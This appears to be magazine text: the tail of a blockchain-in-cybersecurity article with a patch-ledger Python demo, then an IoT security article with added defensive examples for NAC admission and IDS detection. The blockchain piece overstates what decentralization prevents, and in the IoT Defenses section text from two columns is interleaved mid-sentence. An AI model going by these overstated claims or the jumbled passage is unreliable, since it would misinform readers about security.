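on: a rewritten record breaks the chain, and a recorded hash verifies an update
before it is installed. Product names, versions and bytes are constructed."""
import hashlib
import json
from dataclasses import dataclass, asdict
from typing import List, Optional

GENESIS_PREV = "0" * 64


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


@dataclass
class Block:
    index: int
    prev_hash: str        # hash of the previous block (links the chain)
    product: str
    version: str
    artifact_sha256: str  # hash of the patch/update bytes being published

    def hash(self) -> str:
        # Canonical JSON so every party hashes exactly the same bytes.
        payload = json.dumps(asdict(self), sort_keys=True, separators=(",", ":"))
        return sha256_hex(payload.encode())


class PatchLedger:
    def __init__(self) -> None:
        self.blocks: List[Block] = []

    def publish(self, product: str, version: str, artifact: bytes) -> Block:
        """Append a block recording the hash of a released patch."""
        prev = self.blocks[-1].hash() if self.blocks else GENESIS_PREV
        block = Block(len(self.blocks), prev, product, version, sha256_hex(artifact))
        self.blocks.append(block)
        return block

    def verify_chain(self) -> Optional[int]:
        """Index of the first block whose link is broken, or None if intact.
        Caveat: rewriting the LAST block breaks nothing here, because no later
        block links to it. That is why the head hash must be held by many
        independent nodes (the replication a real blockchain provides)."""
        expected_prev = GENESIS_PREV
        for i, block in enumerate(self.blocks):
            if block.index != i or block.prev_hash != expected_prev:
                return i
            expected_prev = block.hash()
        return None

    def verify_artifact(self, product: str, version: str, artifact: bytes) -> bool:
        """True only if the chain is intact AND the bytes match the published hash."""
        if self.verify_chain() is not None:
            return False
        for block in self.blocks:
            if block.product == product and block.version == version:
                return block.artifact_sha256 == sha256_hex(artifact)
        return False  # never published: refuse to install


def demo() -> dict:
    """Publish two constructed releases, then check genuine, modified and unknown
    downloads, and finally show that rewriting an old record is detected."""
    ledger = PatchLedger()
    good = b"thermo-sensor firmware 1.2 (constructed bytes)"
    ledger.publish("thermo-sensor", "1.2", good)
    ledger.publish("thermo-sensor", "1.3", b"thermo-sensor firmware 1.3 (constructed)")
    results = {
        "genuine": ledger.verify_artifact("thermo-sensor", "1.2", good),
        "modified": ledger.verify_artifact("thermo-sensor", "1.2", good + b"\x00"),
        "unknown": ledger.verify_artifact("thermo-sensor", "9.9", good),
    }
    # Rewrite the first record to "bless" the modified bytes: block 1 still
    # carries the hash of the original block 0, so the chain breaks there.
    ledger.blocks[0].artifact_sha256 = sha256_hex(good + b"\x00")
    results["tampered_chain_at"] = ledger.verify_chain()
    results["after_tamper"] = ledger.verify_artifact("thermo-sensor", "1.2", good + b"\x00")
    return results
```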

4. DDoS Attacks Resistance

The most common and potent cyber-attack is the DDoS attack, which has hit Google and Amazon. Distributed denial of service (DDoS) attacks are launched to hijack the traffic on a targeted network or service by spamming it with false requests from different infected bots. These attacks are decentralized in nature.

However, blockchain's decentralization and immutability will be 'beating the hackers at their own game', as a decentralized solution efficiently bypasses these attacks.


5. DNS Security

Like a public directory, the Domain Name Server (DNS) connects domain names to their IP addresses. Decentralizing DNS security can ensure the domain names are tightly secured and beyond reach during a DDoS attack.

The Benefits of Blockchain in Cybersecurity

1. Eradicates single-point failures

Unlike centralized structures, data is decentralized on the blockchain, so one node failure can hardly disrupt the system. Therefore, not even DDoS attacks (which are unlikely to happen to a decentralized structure because of the insane computational cost) can compromise the system.

2. Transparent and traceable

Blockchain's transactions are trackable due to its accurate record-keeping. Each transaction is verified, recorded, and digitized across the network for transparency.
3. Reliable transfers

Blockchain is ideal for authenticating data transfers. Here, smart contracts play a vital role since they execute instructions (in this case, transfer) once pre-set agreements are met.

4. Efficient storage

Once records are verified and stored on the blocks, they become unchangeable. This immutability of the blockchain keeps the data entries safe in a manner never seen before.

5. User confidentiality

Blockchain's built-in cryptographic key features ensure user confidentiality across all networks.

Drawbacks of Blockchain in Cybersecurity

1. No governance

Even though blockchain is bubbling with use cases in virtually all industries, it lacks global regulations.

2. Irrecoverable keys

Keys (private and public) are to blockchain what keys are to cars. These private keys enable device-to-device data encryption. But what happens when a driver loses his car keys? The car becomes inaccessible. However, in blockchain, once these keys are lost, they are irrecoverable, meaning that encrypted data could be lost forever.

3. Blockchain literacy

Although blockchain technology has been around for over a decade, understanding its concept requires deep knowledge of some tools and programming languages. As a result, few blockchain developers are readily available.

4. Complexity and costs

As expected, blockchain technology is very complex and comprises many nodes and computers actively working. This inadvertently requires high computing power and storage capacities, which in turn causes high transaction fees.

5. Satellite development ecosystem

Though blockchain is secure, more and more security efforts and focus should be put on satellite development around the blockchain, which we are seeing being compromised more and more.

Final Thoughts

Cyberattacks like data breaches, DDoS attacks, phishing, ransomware attacks, etc. are cause for alarm, especially as the attacks keep evolving with technology, growing in volume and frequency.


The financial impact costs thousands of victims millions of dollars yearly. As we see more and more utilization of blockchain use cases, government agencies and companies must join hands in cyber warfare by looking out for ways to counter or prevent these attacks.

Employing blockchain's decentralization feature will not only prevent these attacks but pay the bad guys back in their own coin.

Rudy Shoushany
Founder of CryptoTaks and DxTalks

Rudy has wide experience in the Information Technology field in the financial sector, with over 20 years of experience, which gives him the ability to aid organizations. His specialty is ICT Governance, Compliance, Strategies, and CyberSecurity in the Digital Transformation of fintech.

Rudy is a certified professional with many achievements and awards, skilled in executive leadership. He has been an active speaker, Board Member, coach, and mentor for startups. He is the Host and Moderator of the DXTalk Series, a Digital Transformation talk show, which has lately been selected among the top 50 Global Thought Leaders and Influencers.


IoT Security: Definition, Threats, Issues, Defenses, Tools, and Importance
LEADERSHIP

BY CHRISTOPHER MAGNAN

Definition

Internet-of-Things (IoT) security integrates processes and tools that defend networks from cybersecurity threats. These threats continuously evolve and exploit IoT devices’ vulnerabilities. Proactive threat analysis and risk mitigation strategies counteract these threats through policies, technology, and people. IoT networks are diverse, so a single strategy or industry standard will not apply to all networks. Device (also called endpoint, node, or sensor) manufacturers are not forced to comply with security standards; old devices with outdated technology are integrated into the IoT network; devices are placed outside a secure perimeter; and differing communication protocols and ad-hoc reconfiguration further increase IoT security complexity. This article will summarize recent adoption trends, list common security threats, present underlying IoT vulnerabilities, recommend risk mitigation strategies, and present common security tools to strengthen the IoT security posture. Given the breadth of this article, references have been hyperlinked to aid further analysis.

Significance
IoT technology has catalyzed global digital transformation,
identified in many reports as the greatest business
driver. Corporations harness the technology to improve
processes, develop new capabilities, quickly pivot to new
markets, or compile data for strategy development. Smart
cities, smart homes, telehealth, and industrial automation
are applications driving this adoption. Consumers now rely on IoT to improve daily habits, automate home appliances, and provide entertainment. Technology adoption
has accelerated despite supply chain disruptions, a global
semiconductor shortage, and the COVID-19 pandemic.
Technology catalysts include decentralized processing
capability, cloud computing, cheap hardware, wireless
spectrum access, and scalability.


Reports estimate that 12.3 billion IoT devices exist on networks and predict 14.4 billion devices in 2025.

Despite the explosive growth, IoT security has not kept pace with technology adoption. The devices themselves pose many security risks: poor password management, software that is not properly updated, and missing security features on many devices. Users also do not adopt best security practices since they are not held accountable, nor do they properly understand the risk or how to manage security. Effectively, network security is as strong as its weakest link. Therefore, hackers view IoT as the bridge into the enterprise network. For example, a Las Vegas casino’s network was compromised through an unprotected aquarium temperature sensor; this sensor was part of a third-party system design that was neither reviewed for cyber readiness nor actively managed by the Information Technology (IT) team.

Hackers who are motivated by financial gain, revenge, or politics can cause significant damage once they access the network. Users can experience injury, death, financial loss, damaged reputation, corrupted data, data theft, data loss, and service disruption. Corporations must protect personal data including credit card information and Personally Identifiable Information (PII). Once compromised, corporations must reach out to their customers and remedy the breach. Recently, hackers have targeted medical IoT during the COVID-19 pandemic to compromise data or disrupt medical devices, such as insulin pumps. Ethical hackers, in an exercise to demonstrate a connected car’s vulnerability, were able to access the car’s network and remotely control the brakes, the car’s acceleration, and door locks.

Threats

In addition to the short-term damages mentioned above, hackers can cause long-term damage once they access the network. The following threats have been repeatedly identified.

Malware is a type of attack that occurs when software is installed on a network device. The malware could take the form of a worm or virus that potentially infects other network components and servers. Malware can be used to deny access to critical components, gather sensitive data, or corrupt system automation. If a hacker can access an IoT endpoint, the malware will be installed on that sensor. Historically, malware was distributed through e-mail attachments that required unsuspecting people to open them.

Botnets are distributed malware used across an endpoint array to disrupt a portion of the network. Botnets are typically used for denial of service (DoS) attacks or to transfer enterprise command and control to the hacker. The hacker will install the malware on one node, which then infects other nodes with the malware. Removing this distributed attack will require remediating each infected node.

Ransomware is a type of malware that will lock out system users and administrators until a payment (ransom) is made. Command and control could also be transferred to the hacker, increasing the urgency and motivating immediate payment. An example is the compromised vehicle, where the hacker controls the vehicle until the payment is sent. The Baltimore City government and Atlanta City government were affected by this type of attack between 2018 and 2019.


The following two threats are exclusive to sensors and hardware located outside the security perimeter (also identified as defense-in-depth).

Physical theft is the removal of the endpoint or infrastructure from its location. Most likely the network will not be accessed through the stolen node, but service continuity is at risk if it is used to relay data from other endpoints or commands from the enterprise.

Reverse engineering techniques will examine the stolen hardware to replicate the node design. The design can be manufactured and integrated into the network to collect network data or distribute malware across the network.

Issues

Analysts report that IoT adoption has exceeded growth expectations. However, IoT security has lagged the accelerated technology deployment; many systems are deployed without any cyber readiness or vulnerability assessment. The underlying concern is an exponentially growing vulnerability gap that has also exceeded projections.

Common causes leading to the gap are designs, sensor security limitations, asset management, corporate policies and procedures, and education.

Rapid adoption also requires technical talent capable of managing enterprise assets. However, the necessary talent pool is also not growing proportionally. As stated by an ISC2 report, analysts estimate a global shortage of 2.7 million cybersecurity professionals in 2021.

Skills critical to maintaining the security posture include hands-on experience with tools, technical writing, system design, data analysis, and technology lifecycle management. Traditionally, cybersecurity professionals started in information technology (IT) and transitioned into cybersecurity. However, Generation Z and Millennials have completed self-paced or university education to enter the profession but lack technical acumen. Finally, analysts show that cyber professionals are predominantly male (76%) and Caucasian (72%) in the United States and the United Kingdom. These three trends quantify severe limitations with current hiring strategies.

Budgets are also not keeping pace with accelerated IoT adoption. An executive survey reports IoT cybersecurity spending will not increase year over year (YoY). Budgets limit staffing, tool acquisition, training, corporate culture, and risk management capabilities. Recent inflation further limits budget and spending impact. Executives also need to identify critical vulnerabilities that pose the greatest corporate threat and dedicate resources to mitigate risk.

IoT nodes can range from simple sensors that digitize and transmit data to complex command and control systems. Endpoint design standards do not exist, and designs range in processing capabilities, local storage, firmware, communication protocols, and memory. Unfortunately, security features are not a design requirement and it is the responsibility of the system designer to implement security controls. Many manufacturers also do not update software nor release patches to mitigate discovered vulnerabilities. Nodes with patches and new software have finite processing power, memory, and storage that limit data collection or processing while upgrading software.


In many IoT systems, IoT nodes are located outside the security perimeter and communicate via unregulated wireless channels in the Industrial, Scientific, and Medical (ISM) bands. Wireless transceivers in these bands are commercially available and access barriers do not exist. Hackers actively exploit the vulnerabilities through the wireless channels to penetrate the network.

Consumer IoT adoption is also a developing vulnerability. Employees link their wearables (such as biometric trackers) and virtual assistants to public, home, and enterprise wireless networks. Consumers are predominantly ignorant about cybersecurity and poorly manage risk. Wearable manufacturers rarely design security features nor update operating software to patch vulnerabilities. Since personal devices are not corporate assets, they rarely adhere to enterprise compliance and risk mitigation standards.

According to ArchonSecure, recently, many older endpoints have been integrated into IoT networks. This practice is common in manufacturing facilities that do not want to disrupt optimized industrial processes. These nodes are no longer supported by the manufacturers and operate on antiquated firmware that predates basic security features. In many corporations, the assets are not managed by the enterprise IT team but by industrial engineers or facilities maintenance. Many sensors operate on outdated communication protocols, such as RS-232, that are not compliant with internet-based schemas, such as Transmission Control Protocol (TCP) or User Datagram Protocol (UDP). To effectively communicate with the corporate network, these sensors are connected to aggregators which translate data and commands from multiple sensors between the native protocol and the network. This strategy increases network vulnerability because these sensors do not have an IP address and are isolated from asset and configuration management tools. This isolation compromises asset management since the legacy sensors are often not properly catalogued, managed, and decommissioned when the system is permanently removed from service.

Executives have identified broader IoT asset management as a vulnerability. In addition to the deficiencies mentioned above, new designs and capabilities are not properly reported to the enterprise IT staff nor the cyber team. The endpoint vulnerabilities are not properly analyzed, and risk mitigation strategies are not developed and implemented. The endpoints’ risk profile also increases as critical software updates and security patches do not propagate to the network edge.

In the event the network breach is caused by an unknown sensor, forensic analysis and an incident management remediation plan will be unable to quickly quarantine the affected sensor and mitigate damage.

Corporations adopting IoT typically lack system design expertise and outsource the project to engineering firms. One common mistake is omitting a cyber professional’s design assessment of its cyber readiness. Cyber professionals can also advise on asset management, event management, and cyber awareness training. Unfortunately, cyber specialists are in high demand, and adding them to the design team significantly increases project costs. Finally, policies to assess cyber readiness continuously through audits are not implemented to improve the security posture.

Recent surveys have also reported password management is a significant IoT vulnerability. In many sensors, passwords are never implemented nor changed from the default one set by the manufacturer. Because many sensors are not managed by IT, corporate policies for password complexity and periodic password changes are never enforced. As a result, generic or default passwords are easily deciphered.


Business leaders are also concerned with the lack of cyber awareness and accountability. Trending vulnerabilities are not disseminated to employees. Also, employees’ cyber awareness is not audited, and refresher training is rarely presented. Employees also develop risky habits; for example, people who telework may travel overseas and work from unsecured locations with public WiFi. In addition, employees should be held accountable for IT assets issued to them, such as corporate keycards or laptops. Poor management, such as leaving assets unsecured in a public space, is a significant risk, since they can be lost or stolen. Unfortunately, many security concerns remain unreported and violators are not held accountable. This behavior empowers irresponsibility.

With the recent COVID-19 pandemic, business operations have transitioned from offices to homes. Cyber risk has also increased with employees using corporate assets on home networks with unsecured IoT controls and sensors. Since corporate IT does not have the capability to manage employees’ home devices, they cannot quarantine, upgrade, or segment them.

The vulnerabilities listed in this article represent trending security concerns. As technology evolves, new threats will emerge. The optimal cybersecurity strategy is to continuously analyze potential threats and apply best practices to mitigate the risk and the potential impact.

Defenses

Countermeasures to mitigate the risks listed above involve processes, people, and tools (i.e., technology). Processes define the expectations and the sequences implemented to improve the security posture. People need to be trained to follow processes and management’s expectations. Tools aid people with event detection, enforce policies, and evaluate cyber readiness.

A cyber champion or evangelist is needed in many organizations to improve their security posture. This person should be the face of cybersecurity within the organization. Key messaging disseminated throughout the organization should highlight potential improvements to mitigate security gaps, success metrics, any recent security events, and any lessons learned. From an IoT perspective, the evangelist should focus on implementing a strong cyber awareness that is reflected in the system lifecycle, cyber readiness evaluation, event management, and training programs.

A cyber evangelist’s most ambitious goal should be a cyber aware corporate culture throughout the organization, including clerical and hourly staff. In addition to training programs and information sharing, evangelists can recommend rewards for cyber adoption, incorporate cyber practices into performance reviews, identify performance gaps, and recommend improvement plans.

Figure 1: System Development Lifecycle, with the cybersecurity contribution at each of its nine phases:
1. Analysis and 2. Planning: engage the cyber team in planning and design to mitigate cyber risk
3. Design: incorporate cyber tools
4. Development: security control compliance
5. Testing: test the system for cyber readiness and security controls
6. Deployment: continuous monitoring; training
7. Maintenance: event management; asset management
8. Evaluation: cyber scorecard
9. Disposal: data wipe; hardware demolition


Businesses typically lack the system design expertise and


outsource projects to engineering firms. One common
mistake is omitting a cyber readiness design assessment.
Implementing cybersecurity best practices into a system
lifecycle is shown in Figure 1. A system lifecycle is a
standard framework that describes the event sequence
from the initial strategy through system obsolescence. Key
cybersecurity contributions are highlighted through the
system lifecycle. During the design phase, security tools
are integrated into the system design.

The tools consist of both hardware and software platforms


that strengthen the system’s security posture. After the
prototype has been implemented and is ready for a pilot
phase, cyber tools scan the infrastructure, for both,
The partitioning of vulnerable sensors into Virtual Local Area
vulnerabilities and best security practice compliance.
These security gaps must be remedied before the system Networks (VLANs) (also known as network segmentation) is
is activated for use. important to mention at this point.

Event management is a critical gap in cybersecurity. When VLANs partition the network and will restrict traffic from
a data breach or virus infection occurs, key players must the vulnerable sensors into the enterprise. VLANs can also
react to isolate the affected areas, remedy the vulnerability, quarantine compromised devices from the network itself.
collect lessons learned, and recommend strategies to Firewalls and firewall rules can be implemented between
mitigate future risks. VLANs to enhance security between different network
subnets.
To prepare for events, roles and responsibilities must
be clearly defined and processes must be planned and The growth of personal IoT devices used on enterprise
broadcast to the key players. Periodic simulations or networks has increased network vulnerability. The best
rehearsals with key players help refine event sequences, identify dependencies, and address any discovered gaps.

Asset management has been identified as a key defense against cyber risk. IT personnel must track IoT assets throughout their lifecycle and manage software updates, configuration changes, repairs, and decommissioning. If properly managed, sensors can be retired cleanly when they are no longer useful. Decommissioned assets must have their memory wiped and the hardware physically destroyed, so that stored data (including any embedded credentials or keys) is not compromised and the hardware cannot be repurposed or re-engineered to gain unauthorized network access.

Virtual Private Networks (VPNs) can mitigate the risk incurred by employees' use of personal home networks. A VPN establishes an encrypted tunnel between the workstation and the corporate network. Unfortunately, the VPN is only as secure as the device at its end: if an employee connects a personal device, any malware installed on it can reach the corporate network through the tunnel. The best practice for teleworking employees is to issue managed laptops with enterprise antivirus software and other security tools. Another risk mitigation strategy is to deploy a separate wireless network, firewalled off from the corporate network, for personal devices. A policy mandating that these personal assets connect only to this network needs to be released and enforced; tools such as Network Access Control (NAC) can enforce it.

Two-Factor Authentication (2FA), the two-factor case of Multi-Factor Authentication (MFA), strengthens access management by requiring a second, independent factor at the enterprise network's access portal. The three main types of authentication factor are:

 "What I possess?" (something you have) - Examples include a cell phone that receives an SMS code, an e-mail account that receives a temporary password, or a key card. Of these, SMS and e-mail codes are the weakest, since they can be intercepted or phished; an authenticator app or hardware token is preferable.
 "What I know?" (something you know) - Ranges from a username and password to security questions that pertain to you.
 "Who am I?" (something you are) - Such as a fingerprint or facial recognition.

2FA limits the damage from a stolen device or a compromised password, because the attacker still lacks the other factor. For network access via IoT endpoints, the first two factor types (what I possess and what I know) are the ones implemented.


Tools

Scanning tools audit both hardware and software. Compliance scanners audit the network and notify administrators of devices that are not running the recommended software versions or have not been properly patched. Scanning can occur daily, weekly, or monthly. Once non-compliant systems are detected, the administrators must update the software and apply patches to restore compliance.

Vulnerability scanners detect misconfigurations, nonconformance to cybersecurity best practices, and other risks in network components, including IoT nodes. Scans can be configured to recommend mitigation strategies for reported vulnerabilities.

Network Access Control (NAC) uses Access Control Lists (ACLs) to decide which devices may enter the network. Devices not listed in the ACL are either quarantined or redirected to a restricted VLAN. NAC can also be configured to keep devices that a scan has found compromised off the network. NAC also replaces port security, in which a specific switch port is bound to a specific network device; because admission is tied to the device's credentials rather than to its port or MAC address, this eliminates device replication (an attacker cloning the identity of a trusted device).

IoT networks are dynamically scalable and use a Certificate Authority (CA) to manage the Public Key Infrastructure (PKI) for the network. The CA issues certificates to trusted devices. When a device comes online and starts communicating, it presents its credentials to the enterprise. If the enterprise recognizes the credentials, the device is integrated into the network; if not, it is refused. Figure 2 shows this interaction: Figure 2 (a) and (b) show a wireless device whose credentials are not recognized and which is therefore firewalled from the network, while in Figure 2 (c) and (d) the enterprise network recognizes the certificate and allows the device to join. The same PKI keys can also be used to encrypt the data in transit, further hardening the sensor network.

An Intrusion Detection System (IDS) actively monitors wireless network access and reports anomalous behavior.
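As an added example that is not part of the article, the following Python models the NAC admission decision described above: a device's certificate fingerprint is checked against the ACL, a device that fails the compliance baseline is sent to a quarantine VLAN, and a device the last scan found compromised is kept off the sensor network. The ACL, the firmware baseline, the VLAN numbers and the device records are all constructed, and the version comparison assumes dotted numeric firmware versions; in a real deployment the certificate's chain to the CA would be verified by the 802.1X/EAP-TLS server, for which the fingerprint allow-list stands in here. It also covers the device-replication point: a device that clones a trusted sensor's MAC address but cannot present that sensor's certificate still lands on the guest VLAN.

```python
"""NAC admission: which VLAN does a switch port get when a device connects?
Added example, not from the article. The ACL (certificate allow-list),
firmware baseline, VLAN ids and device records are constructed."""
from dataclasses import dataclass
from typing import Dict, Optional, Tuple

# Assumed VLAN numbering: the production sensor network, the remediation-only
# network, and the firewalled network that personal/unknown devices are sent to.
VLAN_SENSORS, VLAN_QUARANTINE, VLAN_GUEST = 20, 666, 30


@dataclass(frozen=True)
class Device:
    mac: str
    model: str
    firmware: str                     # dotted numeric version, e.g. "2.4.1" (assumption)
    cert_fingerprint: Optional[str]   # fingerprint of the device cert, None if it has none
    last_scan_clean: bool             # result of the most recent vulnerability scan


# Constructed ACL (fingerprints shortened for readability): fingerprint -> model
# the CA issued the certificate for.
ACL: Dict[str, str] = {
    "sha256:3f1a9c2e71b0": "sensor-x100",
    "sha256:9b44d0e5c2a7": "cam-p7",
}
# Constructed compliance baseline: minimum firmware version per model.
BASELINE: Dict[str, str] = {"sensor-x100": "2.4.1", "cam-p7": "1.9.0"}


def parse_version(version: str) -> Tuple[int, ...]:
    """'2.10.0' -> (2, 10, 0); tuple comparison orders 2.10 after 2.4 correctly."""
    return tuple(int(part) for part in version.split("."))


def is_compliant(device: Device) -> bool:
    minimum = BASELINE.get(device.model)
    return minimum is not None and parse_version(device.firmware) >= parse_version(minimum)


def admit(device: Device) -> Tuple[int, str]:
    """Return (vlan, reason). Identity is checked first, then health, then compliance,
    so a device never reaches the compliance check without a recognised certificate."""
    issued_for = ACL.get(device.cert_fingerprint) if device.cert_fingerprint else None
    if issued_for != device.model:
        # No certificate, an unknown one, or one issued for a different model:
        # a cloned MAC address does not help the device here.
        return VLAN_GUEST, "certificate not recognised for this device; redirected to guest VLAN"
    if not device.last_scan_clean:
        return VLAN_QUARANTINE, "last vulnerability scan found the device compromised; quarantined"
    if not is_compliant(device):
        return VLAN_QUARANTINE, (f"firmware {device.firmware} is below baseline "
                                 f"{BASELINE[device.model]}; quarantined for patching")
    return VLAN_SENSORS, "trusted certificate, clean scan, patched firmware; admitted"


# Constructed devices: a healthy sensor, a clone of its MAC without its certificate,
# an out-of-date camera, and a camera flagged by the scanner.
TRUSTED = Device("00:1a:2b:3c:4d:01", "sensor-x100", "2.4.3", "sha256:3f1a9c2e71b0", True)
CLONE = Device("00:1a:2b:3c:4d:01", "sensor-x100", "2.4.3", None, True)
OUTDATED = Device("00:1a:2b:3c:4d:02", "cam-p7", "1.8.7", "sha256:9b44d0e5c2a7", True)
COMPROMISED = Device("00:1a:2b:3c:4d:03", "cam-p7", "1.9.2", "sha256:9b44d0e5c2a7", False)

if __name__ == "__main__":
    for dev in (TRUSTED, CLONE, OUTDATED, COMPROMISED):
        vlan, reason = admit(dev)
        print(f"{dev.mac} {dev.model:<11} -> VLAN {vlan:>3}: {reason}")
```

The order of the checks matters: a compromised device with a valid certificate is quarantined rather than dropped to the guest VLAN, because the quarantine VLAN is where the remediation tooling can reach it, while an unidentified device gets no such access.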

Figure 2: Network Access with PKI Certificate Exchange. Panels (a) and (b): a device presenting unrecognized credentials is kept outside the enterprise cloud by the firewall; panels (c) and (d): a device with a CA-issued certificate is admitted to the enterprise cloud.
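The two anomalous patterns the article goes on to describe for the IDS (a device repeatedly trying to reach one host, and a device cycling through a string of addresses) can be expressed as sliding-window rules over flow records. The following Python is an added example, not the article's or any IDS vendor's code: it builds a constructed flow log (a gateway polling two sensors, one address sweep, one hammering source) and runs both rules over it. It produces alerts only, in keeping with the article's point that an IDS monitors and does not enforce. The window length and the two thresholds are assumptions to be tuned per network.

```python
"""Sliding-window IDS rules over flow records: address sweep and hammering.
Added example, not from the article; the flow log is constructed."""
from collections import Counter, defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, NamedTuple, Tuple


class Flow(NamedTuple):
    ts: datetime
    src: str
    dst: str
    dport: int
    action: str


class Alert(NamedTuple):
    rule: str
    src: str
    detail: str


def parse_flow(line: str) -> Flow:
    """Line format (constructed): '<ISO timestamp> <src> <dst> <dport> <allow|deny>'."""
    ts, src, dst, dport, action = line.split()
    return Flow(datetime.fromisoformat(ts), src, dst, int(dport), action)


def build_sample_log() -> List[str]:
    """Constructed sample: a gateway polling two sensors, one host sweeping twelve
    addresses on SSH, and one host hammering the MQTT broker."""
    base = datetime(2022, 7, 28, 10, 0, 0)

    def stamp(seconds: int) -> str:
        return (base + timedelta(seconds=seconds)).isoformat()

    lines = []
    for i in range(5):  # benign polling: two destinations only
        lines.append(f"{stamp(10 * i)} 10.10.5.21 10.10.1.10 443 allow")
        lines.append(f"{stamp(10 * i + 3)} 10.10.5.21 10.10.1.11 443 allow")
    for i in range(12):  # sweep: 10.10.1.1 .. 10.10.1.12 within 12 s
        lines.append(f"{stamp(30 + i)} 10.10.5.77 10.10.1.{i + 1} 22 deny")
    for i in range(25):  # hammering: 25 connection attempts to one broker
        lines.append(f"{stamp(40 + i)} 10.10.5.30 10.10.1.50 8883 deny")
    return lines


def detect(lines: List[str], window: timedelta = timedelta(seconds=60),
           sweep_threshold: int = 10, hammer_threshold: int = 20) -> List[Alert]:
    """Evaluate both rules per source over a sliding time window; one alert per rule per source."""
    flows = sorted((parse_flow(line) for line in lines), key=lambda f: f.ts)
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    fired = set()
    alerts: List[Alert] = []
    for flow in flows:
        q = recent[flow.src]
        q.append((flow.ts, flow.dst))
        while q and flow.ts - q[0][0] > window:   # drop events older than the window
            q.popleft()
        per_dst = Counter(dst for _, dst in q)
        if len(per_dst) >= sweep_threshold and ("sweep", flow.src) not in fired:
            fired.add(("sweep", flow.src))
            alerts.append(Alert("sweep", flow.src,
                                f"{len(per_dst)} distinct destinations within {window.seconds}s"))
        dst, hits = per_dst.most_common(1)[0]
        if hits >= hammer_threshold and ("hammer", flow.src) not in fired:
            fired.add(("hammer", flow.src))
            alerts.append(Alert("hammer", flow.src,
                                f"{hits} attempts to {dst} within {window.seconds}s"))
    return alerts


if __name__ == "__main__":
    for alert in detect(build_sample_log()):
        print(f"[{alert.rule}] {alert.src}: {alert.detail}")
```

Both rules key on the source address, so a sensor that legitimately talks to many peers (a gateway, a time server) needs an exception or a higher threshold, which is the usual source of IDS false positives the article warns about later.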


Intrusion Detection Systems can also be configured to alert administrators when black-listed devices try to communicate with the network, and to alert on anomalous traffic patterns, such as a device repeatedly trying to reach one host or cycling through a string of network addresses. An IDS is a monitoring tool; it does not actively manage the network, so blocking what it reports is the job of the firewall, NAC, or an administrator.

Many sensors are placed outside the organization's secure perimeter and are not protected by fencing, access controls, and guards. These endpoints are exposed to theft or damage. To mitigate the risk, designers can place nodes in inaccessible locations to limit physical access, and house them in weather-resistant enclosures with locks. The enclosures can include an alarm trigger that notifies staff when a node is opened or damaged. The design tradeoff is cost and the accessibility needed to service the nodes.

Risk matrices help identify which vulnerabilities are most likely to cause significant damage, and they drive cybersecurity budgets. A risk matrix is a high-level analysis tool organizations use to identify the key areas that require the most resources. The matrix compares different risks in terms of their probability of occurrence and their potential damage. Figure 3 shows a generic risk template. Each risk is scored on a scale of 1 to 5 for likelihood and for consequence, and the product of the two gives the cell's score. The cells are also color-coded to highlight criticality: red cells identify risks with the greatest probability and impact, which require immediate attention, while green cells have minimal impact or probability and can be passively monitored.

Figure 3: Risk Template (cell score = likelihood x consequence; Low 1-3, Moderate 4-6, High 8-12, Extreme 15-25)

                                            CONSEQUENCE
LIKELIHOOD            Negligible (1)  Minor (2)     Moderate (3)  Major (4)     Catastrophic (5)
Almost certain (5)    Moderate   5    High     10   Extreme  15   Extreme  20   Extreme      25
Likely (4)            Moderate   4    High      8   High     12   Extreme  16   Extreme      20
Possible (3)          Low        3    Moderate  6   High      9   High     12   Extreme      15
Unlikely (2)          Low        2    Moderate  4   Moderate  6   High      8   High         10
Rare (1)              Low        1    Low       2   Low       3   Moderate  4   Moderate      5

A generic scorecard is a dashboard used to continuously assess cybersecurity training, policies, and infrastructure. A scorecard should be simple and easy to read, however,


Figure 4: Scorecard Example. The executive summary grades an example insurance company (Stock: GLC (NYSE) $155.29; Headquarters: Hartford, CT; Revenue: 63.18 billion USD (2016); 49,500 employees (2016)) with an overall Cyber Risk grade and a Security Rank (125th of all companies, 3rd in the insurance industry), scores it on Resiliency, Safeguard, Privacy and Reputation, lists its digital-footprint metrics (DNS Security, Email Security, Patch Management, IP/Domain Reputation, Brand Monitoring, Web Ranking, Leaked Credentials, Information Disclosure, Website Security), plots a Cyber Risk Trend from 2016-10 to 2017-03, and gives the score details: Brand Monitoring A, IP/Domain Reputation C, Patch Management D, Leaked Credentials F, DNS Health C, Website Security B, Email Security B, Information Disclosure A.

The top quadrant is an evaluation of how the company's cyber posture compares to its competitors. This scorecard is just an example, but the key data points are the overall score, the breakdown of the score into individual metrics, such as patch management, the weighting of each metric, and the trend of the score over the past year. Other data points not presented in this scorecard are key security events, such as a data breach, or bullets describing deficiencies. A generic scorecard template can be downloaded, or a custom scorecard highlighting key metrics can be built in a spreadsheet tool.

Finally, organizations must perform periodic reevaluations and audits to identify developing vulnerabilities. Remediation plans are then evaluated and implemented to mitigate risk. The Deming Cycle (Plan-Do-Check-Act), shown in Figure 5, is a management framework used to assess cyber readiness continuously and implement corrective action. During the Plan stage, multiple strategies are evaluated for cost, complexity, and potential efficacy. The success criteria are also defined during this phase, as is the fallback plan in case the strategy is not successfully implemented. The best strategy is selected and the implementation team plans the roll-out. The implementation team then integrates the strategy during the Do phase. During the Check phase, the implementation is evaluated against its key success factors, and lessons learned are discussed. Finally, in the Act phase, the next improvement is selected based on the results and lessons learned. The Deming Cycle is then repeated as the next iteration is planned, implemented, and evaluated.


Figure 5: Deming Cycle (Plan -> Do -> Check -> Act, repeated as continuous improvement)

Conclusion
IoT technology represents transformational opportunities for many businesses. The benefits include data mining, new business opportunities, and reduced cost. However, IoT is a growing vulnerability within enterprise networks. Many factors, such as training, oversight, and system design, contribute to this vulnerability. Fortunately, there are many tools and strategies that can mitigate the risk. Organizations must determine what their greatest risk is, develop a strategy to mitigate it, assess the strategy's efficacy, and improve the strategy.

Christopher Magnan
Senior Manager of Network
Consolidation | Cloud |
Cybersecurity | Unified
Capabilities

Christopher manages a
telecommunications program
supporting the Defense Information Systems Agency
(DISA). During his career, he has led a team that
has implemented cybersecurity technologies and
best practices, integrated telecommunications, and
implemented Bring Your Own Device (BYOD) to a diverse
global enterprise. Prior to SuprTEK, he managed the
design and deployment of Smart City technology across
Naval District Washington. He received his MBA and
Master’s in Electrical Engineering from the University of
Maryland – College Park.

BUSINESS & LEISURE

